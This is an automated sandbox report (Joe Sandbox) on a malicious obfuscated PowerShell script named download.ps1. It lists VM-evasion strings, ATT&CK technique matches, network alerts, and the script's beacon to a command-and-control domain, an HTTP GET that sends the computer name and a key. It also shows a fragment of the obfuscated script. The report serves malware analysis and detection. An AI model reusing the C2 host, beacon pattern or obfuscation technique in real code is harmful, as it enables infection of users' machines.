Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in load order: atl.dll, mscoree.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, msasn1.dll, amsi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, urlmon.dll, xmllite.dll, iertutil.dll, netutils.dll, secur32.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7AF5D2A5 pushad ; iretd 1_2_00007FFA7AF5D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B072313 pushad ; iretd 1_2_00007FFA7B07232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B0700BD pushad ; iretd 1_2_00007FFA7B0700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B076943 push eax; retf 1_2_00007FFA7B076949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B078F96 push ebx; retf 002Ah 1_2_00007FFA7B078FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B2E0F6A push dword ptr [eax]; ret 1_2_00007FFA7B2E0F6F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B2E31EA push cs; ret 1_2_00007FFA7B2E31EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B327AA2 push ss; ret 1_2_00007FFA7B327AA7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B328110 pushad ; retf 1_2_00007FFA7B328111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B321B17 push ebx; iretd 1_2_00007FFA7B321B1A

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9886
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareh
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8C65
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000001.00000002.643109239001.000001A7560E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwarex
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareX
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-GB:VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the signature counts shown in the matrix; techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
download.ps1 | 3% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.217.164 | true | false | | high
cmacnnkfbhlcncm.top | 45.61.136.138 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
http://www.google.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php? | powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527 | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Z | powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://cmacnnkfbhlcncm.top | powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcK | powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/PesterXzS | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.mic8 | powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.microsoft.co | powershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/recaptcha/api.js | powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlXzS | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com | powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.c | powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.pngXzS | powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.217.164 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 45.61.136.138 | cmacnnkfbhlcncm.top | United States | 40676 | AS40676US | false |
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579001
                                                                Start date and time:2024-12-20 17:39:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 35s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                Run name:Suspected VM Detection
Number of new started processes analysed:7
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal64.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 87%
                                                                • Number of executed functions: 11
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.111.227.13, 150.171.28.10, 23.50.115.148
                                                                • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, ctldl.windowsupdate.com, g.bing.com, nexusrules.officeapps.live.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 5908 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • VT rate limit hit for: download.ps1
| Time | Type | Description |
|---|---|---|
| 11:41:12 | API Interceptor | 34x Sleep call for process: powershell.exe modified |
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulSiClj:NllU
                                                                MD5:E127DFF492A57525D991EFA67CD7E95D
                                                                SHA1:AD2AC988752D6DC761CC7292B07E20274E237B0A
                                                                SHA-256:6159899BF01646EE5CBC281EDFFA9D99EDD14E775713BEEB951E775C91F2AABF
                                                                SHA-512:D0CE3E4849BC35838B3879BB8CFFA24C71F695EC061C4C047F401FA5FA86CD3E712E73ECC42D3D4D800A09CFC0E3C421D3B4C4DF6D923540A15119BB3776D7FC
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:@...e...................................'............@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7356210492740716
                                                                Encrypted:false
                                                                SSDEEP:48:25JLS4s+CZwU2jbbukvhkvklCywcSDwfFixc5SogZoV8AjwfFixc5SogZoVpA:kO+CnoGkvhkvCCt3wfFiDHp2wfFiDHB
                                                                MD5:848762BDDE989AA45B379CEB0E687909
                                                                SHA1:AC782643299E8A2A9EF67CD9321133831D5F453B
                                                                SHA-256:506DE11B25A2DCE1F74B637704F6DCE7A8E5351CFE6E9402DAEEC49684F7AC18
                                                                SHA-512:6E9D9FC3081926BD5884F890E8B5388655D5CEB1C02D6915AAD7DFD5A55DB5817DF46E8DBDB9D0DF8B339709391C0888281A47F24C520206AE8EC930F0D46EA4
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ......A....TO...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....._...R.......R......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<.Y...............................A.p.p.D.a.t.a...B.V.1......Y ...Roaming.@......&W.<.Y ..........................._p..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<.Y.............................RN.M.i.c.r.o.s.o.f.t.....V.1......Y.U..Windows.@......&W.<.Y...............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<.Y......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<.YO.....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<.Y9...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<.Y%.....8...........
                                                                File type:ASCII text, with very long lines (11087), with CRLF line terminators
                                                                Entropy (8bit):6.0047648383145775
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:20'059 bytes
                                                                  MD5:506d528176abebda1202676b0528e974
                                                                  SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
                                                                  SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
                                                                  SHA512:9266f19b578ef6180585ea531c91878e1fd3d40ca204b60951746edb3eed4c7b6e119ceab1811287216c9f023bfdd511f3109a964ccaf68caf8692dac51d50a2
                                                                  SSDEEP:384:Aij/eeL5dYClhTpoPzuOInAwy7rtefXgxl5vfMim7P:zmSdjzyzuOFvtefXgxlFEF
                                                                  TLSH:CF927E95FBC8F8C2C5CEA61EA4177C443B8270AED5F3ADC4B6C5C6C1A2813556AD4D82
                                                                  File Content Preview:$vnhmefubpw=$executioncontext;$isesenarateranerenor = ([char[]]@((-7434+7487),(-6272+6324),(8401-8344),(-4633+(10159-5476)),(-6874+(2253+4677)),(378378/7007),(333592/5957),(3330-(8577225/2619)),(67595/(2169-940)),(186-136),(-5822+(7180-1302)),(28992/(3793
                                                                  Icon Hash:3270d6baae77db44
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-20T17:41:13.852263+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 49845 | 23.50.114.17 | 443 | TCP |
| 2024-12-20T17:41:14.563032+0100 | 2859391 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.11.30 | 58409 | 1.1.1.1 | 53 | UDP |
| 2024-12-20T17:42:17.415778+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 49853 | 23.50.114.17 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 20, 2024 17:41:15.073016882 CET | 49846 | 80 | 192.168.11.30 | 45.61.136.138 |
| Dec 20, 2024 17:41:15.265038013 CET | 80 | 49846 | 45.61.136.138 | 192.168.11.30 |
| Dec 20, 2024 17:41:15.265356064 CET | 49846 | 80 | 192.168.11.30 | 45.61.136.138 |
| Dec 20, 2024 17:41:15.272520065 CET | 49846 | 80 | 192.168.11.30 | 45.61.136.138 |
| Dec 20, 2024 17:41:15.464364052 CET | 80 | 49846 | 45.61.136.138 | 192.168.11.30 |
| Dec 20, 2024 17:41:15.516571999 CET | 80 | 49846 | 45.61.136.138 | 192.168.11.30 |
| Dec 20, 2024 17:41:15.564649105 CET | 49846 | 80 | 192.168.11.30 | 45.61.136.138 |
| Dec 20, 2024 17:41:15.652539015 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:15.780940056 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:15.781150103 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:15.781240940 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:15.909874916 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.471636057 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.471668959 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.471848011 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:16.472948074 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:16.602025986 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.615920067 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.616164923 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.616177082 CET | 80 | 49847 | 142.250.217.164 | 192.168.11.30 |
| Dec 20, 2024 17:41:16.616343021 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Dec 20, 2024 17:41:16.744822979 CET | 49846 | 80 | 192.168.11.30 | 45.61.136.138 |
| Dec 20, 2024 17:41:16.744841099 CET | 49847 | 80 | 192.168.11.30 | 142.250.217.164 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 20, 2024 17:41:14.563031912 CET | 58409 | 53 | 192.168.11.30 | 1.1.1.1 |
| Dec 20, 2024 17:41:15.062264919 CET | 53 | 58409 | 1.1.1.1 | 192.168.11.30 |
| Dec 20, 2024 17:41:15.521645069 CET | 64858 | 53 | 192.168.11.30 | 1.1.1.1 |
| Dec 20, 2024 17:41:15.651164055 CET | 53 | 64858 | 1.1.1.1 | 192.168.11.30 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:41:14.563031912 CET | 192.168.11.30 | 1.1.1.1 | 0x6d6a | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:41:15.521645069 CET | 192.168.11.30 | 1.1.1.1 | 0xf2c8 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:41:15.062264919 CET | 1.1.1.1 | 192.168.11.30 | 0x6d6a | No error (0) | cmacnnkfbhlcncm.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:41:15.651164055 CET | 1.1.1.1 | 192.168.11.30 | 0xf2c8 | No error (0) | www.google.com | | 142.250.217.164 | A (IP address) | IN (0x0001) | false
                                                                  • cmacnnkfbhlcncm.top
                                                                  • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49846 | 45.61.136.138 | 80 | 5908 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:41:15.272520065 CET | 215 | OUT | GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: cmacnnkfbhlcncm.top
Connection: Keep-Alive
